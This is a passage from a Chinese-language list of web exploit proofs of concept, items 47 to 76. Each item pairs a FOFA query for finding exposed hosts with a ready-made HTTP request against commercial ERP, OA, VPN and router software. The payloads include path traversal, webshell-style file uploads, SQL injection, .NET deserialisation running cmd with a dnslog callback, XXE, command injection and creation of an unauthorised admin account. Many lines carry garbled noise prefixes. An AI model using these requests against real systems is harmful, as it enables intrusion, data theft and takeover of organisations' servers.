) Y% u+ {1 k3 C. j0 a: GAccept-Language: zh-CN,zh;q=0.9
  c; `0 g4 d) u* y7 [: ]Connection: close
- S  d5 l- d  L% K# {# Y
6 e1 P6 n# h, F+ l2 B
47. 用友GRP A++Cloud 政府财务云 任意文件读取
FOFA：body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
* }$ [& K4 ]+ r+ `, x& d& DHost: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
! L0 F" y" `. y. eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 T8 N& w2 N  ?( X1 A. `Accept-Encoding: gzip, deflate, br
: a4 `) u: g9 D1 zAccept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
; x; X4 Y7 {& u) h5 _3 ?Connection: close
; B7 t! R- S- Y% [3 r1 Z


48. 用友U8 CRM swfupload 任意文件上传
FOFA：title="用友U8CRM"
% p7 ^) [4 G8 Z. H/ \: IPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
5 B: D  Q3 _' h$ k; @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
8 f  L, R0 o" ^, K6 Q------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
* C7 v! J2 @( z! h3 d1231
% f( U! ^6 F1 ~' C% e. dContent-Type: application/octet-stream
/ o) A1 n" Q3 g6 Z------269520967239406871642430066855
  _' e. q1 E. i$ ]* ZContent-Disposition: form-data; name="upload"
( ], l7 y+ `  b5 X( bupload
  D" K  g. W9 d5 e- {------269520967239406871642430066855--
2 u7 U% G/ f) C

49. 用友U8 CRM系统uploadfile.php接口任意文件上传
8 H, q$ j3 L, Z, SFOFA：body="用友U8CRM"
" l  t  H1 v! |
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
; n9 L* N; z; ~1 iContent-Length: 329
+ \7 D5 J% c  a6 k+ T- |1 h( a! IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

) B- d$ V% k# R7 t& S; ~# Q-----------------------------vvv3wdayqv3yppdxvn3w
  t3 `& f( k, @5 e" a( oContent-Disposition: form-data; name="file"; filename="%s.php "
+ u7 `3 I% m( T6 }9 w$ f* j4 SContent-Type: application/octet-stream
! n6 K3 x  x: t+ u! w
, @: {* o' N2 P1 t4 n+ Swersqqmlumloqa
4 _& v. J) d7 X-----------------------------vvv3wdayqv3yppdxvn3w
1 I$ c8 \0 N- @7 AContent-Disposition: form-data; name="upload"

upload
, [( U7 U+ l9 W# s* y: X  t6 r; Y-----------------------------vvv3wdayqv3yppdxvn3w--


http://x.x.x.x/tmpfile/updB3CB.tmp.php
# p; ?2 H6 B/ I$ L: P3 @/ j( ^" F
7 L% w6 H8 `" m: o50. QDocs Smart School 6.4.1 filterRecords SQL注入
FOFA：body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
$ u- r  ?' i, VHost: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
' ]3 N& u# ~* M% ^0 }Connection: close
Content-Length: 224
' g( ^- |- `7 a4 n3 e& ZAccept: */*
Accept-Language: en
3 Y' E3 s4 J, G3 w1 {' k/ e# bContent-Type: application/x-www-form-urlencoded
, V& A0 g) M. ^; H1 S3 ~Accept-Encoding: gzip
' ~" C( A2 _3 f+ H
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
5 [- l- T* ~2 W1 ^: a% e+ n& m
& b; |' ], T- D# ~" s- D. ^
2 w* h6 w; l9 P, C* @51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
FOFA：app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
; {4 x2 A& W, O4 A& ^! h- E1 NHost: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
& s" e* Y* o+ y1 K0 _: q$ `Accept-Encoding: gzip, deflate
+ H4 k! o! z' B6 h! v- Z) AAccept-Language: zh-CN,zh;q=0.9
Connection: close
7 Q- W* f3 T( B& g. d! ?
- R  D% J6 b* F$ }' y/ S0 W$ O# m
$ u/ N, O2 t: t& U52. 泛微E-Office json_common.php sql注入
FOFA：app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
' z2 z/ F0 K5 D6 Y7 G. x3 eHost: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
* q  Y% N  ~& C0 U  c, R$ e6 E# }Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
$ q/ |6 J+ t; _! i
% t0 Y6 J& R* c- E0 I& J' ^
53. 迪普 DPTech VPN Service 任意文件上传
FOFA：app="DPtech-SSLVPN"
* o+ O; E. t( L) a1 w5 f# W1 t/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
8 @: ]' {/ F4 C% N# k% f5 `" `

2 t4 V8 m  b) j# }, ~7 [54. 畅捷通T+ getstorewarehousebystore 远程代码执行
FOFA：app="畅捷通-TPlus"
第一步，向目标发送数据包，执行命令，将指定字符串写入指定文件
2 Q* W1 _% h/ C- G"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
* Q8 @* R( d) k
" d8 ?: F! q! i/ F% V
完整数据包
& W1 P9 I# q9 T/ R6 Q  o$ wPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
2 }, j  q3 C, f! R+ b) VContent-Length: 593

; W  X8 X  B( n" V{
/ i# c# e/ x& x7 }9 j7 Q* Y"storeID":{
) @# a& W. C& S  w "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
% z$ B+ C' ?/ h( l "MethodName":"Start",
  "ObjectInstance":{
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
) b2 J9 u- P. |/ a$ `5 V    "StartInfo":{
- U1 |% A, `( q! J   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
$ b+ |+ X- @$ m$ X& L& ]( o. ]4 i# ]    "FileName":"cmd",
, ^/ [; G5 b2 a9 h    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
    }
7 ^* i' g- O! G. t2 k9 `3 W  }
  }
4 t; S% i& Q6 g/ ^: [8 a}


  Q+ Z4 z! D) W+ Y第二步，访问如下url
* l3 v  u( p1 h( p" o/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
" T& G% _$ w  X6 A  V% {+ L9 R+ _
  m% y& t" J( H$ S8 b
55. 畅捷通T+ getdecallusers信息泄露
FOFA：app="畅捷通-TPlus"
( }  q. j# F7 m9 @; `% ~第一步，通过
/ l5 _1 t. E4 a/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
. S2 d, f- I2 L- @第二步，利用获取到的Cookie请求
% M: r  y2 P: r8 I/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
7 H0 S% B( v" o4 C7 E5 U5 x
) P; R$ R7 l* t56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
5 J1 t( v4 q  n- yFOFA: app="畅捷通-TPlus"
/ N7 q6 F, f  a( M9 rPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
  l2 X3 Y  M# |( M& y( R: CHost: x.x.x.x
( i1 v' z+ `, `: E$ ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

5 l) F, }; e" T# v$ x* P* q{
) y' {4 E/ \8 A  c5 V$ A( n  "storeID":{
4 Z9 }, c; k: @- X    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
: E. c0 ~1 e! A. Q! e5 \   "MethodName":"Start",
; E0 t2 \0 o) h$ `4 h    "ObjectInstance":{
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
: U) e3 s) a; _5 S6 c           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
) J) p1 k/ G. {$ a- J       }
) e6 [6 G& Q1 P9 |* y3 ]6 \: |9 b    }
  }
* K0 m) G9 A% J; j# P( P# c5 ]3 S}
1 U# t) C( K2 y

1 P7 K8 e. b' F57. 畅捷通T+ keyEdit.aspx SQL注入
# g( `' Y. {6 z$ f7 ~4 j- K3 RFOFA：app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
: n, ^0 f$ ?6 h- T9 Q7 @Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
/ T7 K9 @/ ^# ~Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
! q! Y+ B$ V) l8 T3 W+ c: rConnection: close

* |/ l: N$ V- K1 U
2 E  I( W6 b- a58. 畅捷通T+ KeyInfoList.aspx sql注入
FOFA：app="畅捷通-TPlus"
" c, s( E8 M+ i! r7 E" f! wGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
, K* y/ I$ w' \# _& Z' i0 sHost: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
4 i5 p. q2 \9 s4 KAccept-Charset: utf-8
Accept-Encoding: gzip, deflate
, x# v$ Q$ a' W2 ~Connection: close
) s; z0 b' J( b+ J, ~) L% N% O4 D" l

59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
% S, m% L5 Q4 E7 RFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
, S3 E8 o  S* K& x# J) K: nHost: 192.168.86.128:9090
* u# }0 a! b1 o" M% tUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
, c2 L0 }1 r% W5 M; kConnection: close
+ u  k, [  T6 }! V. g* V9 h( q0 K9 pContent-Length: 1669
Accept: */*
4 I3 W1 D, d8 N0 k, q2 L8 z* U7 A2 WAccept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
1 E9 O3 w7 h3 k# d
PAYLOAD
) f: Y: \. I' \1 `+ o

60. 百卓Smart管理平台 importexport.php SQL注入
FOFA：title="Smart管理平台"
8 s" r) }# r0 _4 C2 tGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
8 D1 M3 C7 a) YHost:
, t+ j% x/ @, n3 r: O# E1 KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, l1 d8 L! X# Z% _/ D) D' pAccept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


) G$ p$ @# E+ e% \" j$ c+ a3 f7 f61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
  P4 \, h8 r4 ~FOFA: title="欢迎使用浙大恩特客户资源管理系统"
* t& f: R; P$ a' n& {POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
: k6 U( \  L$ V& d7 `( N0 }4 ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
  a3 `) q2 R! `# e5 V: u: iConnection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
# r+ j, Y' m9 R# x0 l  IContent-Type: application/x-www-form-urlencoded

1 E- A/ B: M. O. T' W# I8uxssX66eqrqtKObcVa0kid98xa

$ R5 u" w' V( c" W. h" W. J9 E
% x9 Y$ m. j' O' I62. IP-guard WebServer 远程命令执行
FOFA："IP-guard" && icon_hash="2030860561"
- B' c% m& n$ D( v1 m  nGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
/ G6 X5 b) i( w" r1 r- a4 {  THost: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
0 Y$ T$ m$ e* S2 \. RConnection: close
. z  R' a  m* L2 p- c0 PAccept: */*
. Q/ ?3 a6 ~' X! y& U3 nAccept-Language: en
. B* L4 Y- e, u: p$ D4 w% H7 iAccept-Encoding: gzip
9 p2 M5 [: Z( |1 h# o2 X* P
0 @8 |7 v& T5 g* K9 ~9 D
1 M1 Z" L; f" L' M) W4 _% ^访问
( u6 _$ f' d, Q4 I+ G
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
2 B/ A& b0 R3 J3 w; ]  l3 |

8 n% j$ E6 g2 `63. IP-guard WebServer任意文件读取
IP-guard < 4.82.0609.0
FOFA：icon_hash="2030860561"
6 F0 O. o" _5 m  n0 s1 L; s& @POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
9 k: z1 }  R3 g- BHost: your-ip
8 r, `0 y" z/ g3 }5 h* B% `6 Y: aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ q& D% y) Q; r& Z9 wAccept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
0 }. u9 ?+ X6 T0 U
/ D; _& p8 o9 A' rpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

/ T9 L3 ^! w0 b0 I( G- S% k( p) s4 U6 ~64. 捷诚管理信息系统CWSFinanceCommon SQL注入
FOFA：body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
# e' o! Z3 F7 z6 i7 E, T' KUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
; f; A' z6 M) GContent-Length: 369
( I. h1 k7 [2 j9 LAccept: */*
Accept-Language: en
8 {& ^! V2 \9 O! Q6 mContent-Type: text/xml; charset=utf-8
9 p  j. I  j5 x( ]' T: l2 RAccept-Encoding: gzip

4 P/ l/ S) f2 @- Y3 U<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
. K' H# n' U: P<soap:Body>
7 [+ q8 Z, F  K, Z- E1 n& N# L    <GetOSpById xmlns="http://tempuri.org/">
( z- O# j3 s' O+ I% T  t8 t0 l      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
9 y8 t! o( S6 I  </soap:Body>
3 \* y( P' Q. X6 Q4 t3 u</soap:Envelope>
0 [, R, g/ v- N6 d+ |' Z' Z
1 L' ~4 i/ c" K% I  l
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
" p5 h7 [$ Q/ p& t4 tFOFA：title="欢迎使用脸爱云 一脸通智慧管理平台"
响应200即成功创建账号test123456/123456
0 t1 y* Q! T3 C; _/ F6 DPOST /SystemMng.ashx HTTP/1.1
Host:
) H* }( `0 x; E' ~% ZUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
# Y! m+ B# \7 O4 a  e& u6 ^Accept: */*
Connection: close
( ~9 r! b# Y0 e2 U" D+ aAccept-Language: en
7 B' c. x+ H& \" s. |Content-Length: 174

0 ~! Z, N; \0 H- o& a9 R0 H2 |! GoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

. k7 M8 ]2 ~8 n; G7 }/ p9 B5 o2 s
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
' @' W1 s, E. f* gFOFA：app="万户ezOFFICE协同管理平台"

% _$ u# P. ~6 z( }; g2 @GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
3 u8 r" V- [3 ]( m4 m/ j8 {. c) [Connection: close
Accept: */*
1 M4 J7 Z' e0 k7 j4 ?5 J; g) SAccept-Language: en
Accept-Encoding: gzip

# ~% n/ G2 Z( l" `
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在

67. 万户ezOFFICE wpsservlet任意文件上传
( b5 ?9 D  T6 t, a% T# e* [5 u3 CFOFA：app="万户网络-ezOFFICE"
newdocId和filename参数表示写入文件名称，dir参数表示写入文件的路径，fileType参数表示文件类型
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
4 B  ~) F# m% a" G$ j6 v' rContent-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
% t* a2 o7 n  @! GAccept-Encoding: gzip, deflate
6 y, U- L3 Z* g6 f! {5 b" GAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
0 A- q; T, K! s( X7 x$ a! w" Q1 mDNT: 1
Upgrade-Insecure-Requests: 1
" k" z7 V/ C- b0 P1 W' m. P
--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
" ]3 |2 g& O7 n( Q0 {
, f* \  h8 r  V( L) k, T<% out.print("sasdfghjkj");%>
7 X7 f' W0 A( S9 L7 l) t3 c6 j--ufuadpxathqvxfqnuyuqaozvseiueerp--


# h+ N6 z- e! K% S3 {( d2 e( p- j文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
# L1 O7 @- g' D/ D2 O% f
68. 万户ezOFFICE wf_printnum.jsp SQL注入
FOFA：app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
5 A+ i) r4 U6 R! f# p) B( w$ h) SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
* z( @7 o- u, g4 m& aAccept-Encoding: gzip, deflate
7 Z3 R/ o: F) u6 }/ a" SAccept-Language: zh-CN,zh;q=0.9
Connection: close
7 s0 v7 b+ B$ @* ~% f8 k/ p6 D
( I  R/ w5 H1 U- @4 X0 J: i
9 b% l0 S0 l6 p69. 万户 ezOFFICE contract_gd.jsp SQL注入
" w* E! e7 a: F" {! E2 P# R$ u! jFOFA：app="万户ezOFFICE协同管理平台"
* x6 E  O, C5 P) b6 ^. F  gGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
! e9 b1 l; T$ n  C8 CUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


70. 万户ezEIP success 命令执行
FOFA：app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
: q7 F( X) O( s9 tHost: {{Hostname}}
' ^% \4 E* a) I, v3 [- }# qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
! H+ I: A9 j; M7 ]& z# j' {- u; P1 CTYPE: C
8 T2 ^# L, [$ y( H$ |4 p& ?: YContent-Length: 16702

) n0 F/ v; Q: I$ E" o5 ]__VIEWSTATE=PAYLOAD
/ l5 j6 f) @9 ]
; t' ^  o7 {1 V" w6 N! Z/ }! v
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
FOFA：body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
" _" c% I. u5 C- YHost: x.x.x.xx.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
7 h8 i# I9 q/ MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 }0 j! j/ `# f9 X+ ]Accept-Encoding: gzip, deflate
5 Q, p( C& N; ^" F8 g3 m2 ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; |% t' M4 s- _; u( g# LUpgrade-Insecure-Requests: 1

$ A" j8 v* X6 ^/ `5 d
  M0 ^% ]& I7 H! f- |% n72. 致远OA getAjaxDataServlet XXE
FOFA：app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
& X, D$ }3 E/ c1 M, w  f! i0 c. KContent-Length: 583
; ]4 L( G# o, I3 q- GContent-Type: application/x-www-form-urlencoded
$ r/ x# {/ A3 Z! K* V3 nAccept-Encoding: gzip
, `' O1 k, N: g( m: _
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
, F* J$ j1 N7 T5 |

. R! t2 \) H' R# a7 z  l3 H9 U& F  }73. GeoServer wms远程代码执行
0 Q; ^; F: C+ ^! e4 {: ?4 X; hFOFA：icon_hash=”97540678”
! ^0 V9 P. G- {7 I- A0 ]/ M; [0 @POST /geoserver/wms HTTP/1.1
: B# N3 B9 \+ \6 f! M" d( D; h4 h* {Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
& v: H* ?! R- x8 \Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
, @2 W. T9 J/ ?Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD
+ z3 O9 H' G+ F2 j2 s) [$ \+ `* _
( f  a! c/ L& m, L! }1 _$ n
1 X6 r3 w- \' N' r74. 致远M3-server 6_1sp1 反序列化RCE
+ L7 @$ \2 v8 e2 w/ `# M3 lFOFA：title="M3-Server"
PAYLOAD
2 h3 i: t$ g5 N7 A" L3 M. L) l1 C& x
! A) ~( a& H6 B, f& Q75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
9 `" y( y: A" V* T1 HFOFA：app="TELESQUARE-TLR-2005KSH"
5 V& }3 U) T/ p0 n3 ?% HGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
0 e: B6 O3 G' q: L+ Y/ PAccept-Language: en
Accept-Encoding: gzip


GET /cgi-bin/test28256.txt HTTP/1.1
& P% ^% z! q9 @0 _* X, x" THost: x.x.x.x
: _) C% O+ b1 K5 @: Y0 C1 j

76. 新开普掌上校园服务管理平台service.action远程命令执行
) n. j! z2 T% B# I3 K1 kFOFA：title="掌上校园服务管理平台"
7 m; \, s. j: _, e8 fPOST /service_transport/service.action HTTP/1.1
" j0 Y$ e8 O& H+ JHost: x.x.x.x
( z. z6 S1 o0 v9 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
" g; v  l9 O& s' c/ {" N( z* B/ PContent-Length: 211
